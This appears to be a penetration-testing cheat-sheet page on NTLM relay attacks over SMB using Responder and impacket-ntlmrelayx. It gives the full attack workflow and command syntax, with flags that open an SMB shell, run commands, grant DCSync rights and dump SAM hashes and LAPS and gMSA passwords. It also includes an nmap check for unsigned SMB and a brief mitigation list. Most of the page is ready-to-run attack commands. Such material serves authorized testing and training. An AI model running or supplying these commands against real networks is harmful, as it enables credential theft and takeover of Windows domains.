smb relay ntlmrelayx

REQUIREMENTS:

  • SMB signing must be disabled.

  • Relayed user creds must be admin on machine

Information

Invoke this attack: request callback to SMB on kali using \\IP

  1. responder will capture the request, pass it to ntlmrelayx

  2. ntlmrelayx will relay the request to TARGET.txt

    1. Enables RemoteRegistry

      1. Captures system bootkey

      2. Performs intended action; Default action: SAM dump using secretsdump.py

      3. Retores RemoteRegistry back to disabled state.

impacket-ntlmrelayx [-6] [-t TARGET | -tf TARGET_FILE] -smb2support [-l LOOT_DIR] [-i] [-e "SHELL.exe"] [-c "COMMANDS"]
--escalate-user USER: will escalate to add ACL Replication-Get-Changes-All for USER on DC (DCSync)
# -6: IPv6
# -i: will open a smb shell, can connect using nc IP PORT
# --dump-laps: dump LAPS passwords
# --dump-gmsa: dump gMSA passwords

SMB-check

nmap --script=smb2-security-mode.nse -p 445 IP/CIDR

Method:

  1. set SMB=Off and HTTP=Off in /etc/responder/Responder.conf

  2. Run sudo responder -I INTF -rdwv

  3. Run ntlmrelayx.py -tf TARGET.txt -smb2support [FLAGS]

Fix

  • Enable SMB signing on all devices (can cause performance issues).

  • Disable NTLM Auth on network

  • Account tiering (restricting domain admins to specific tasks)

Previousmitm6Nextresponder

Last updated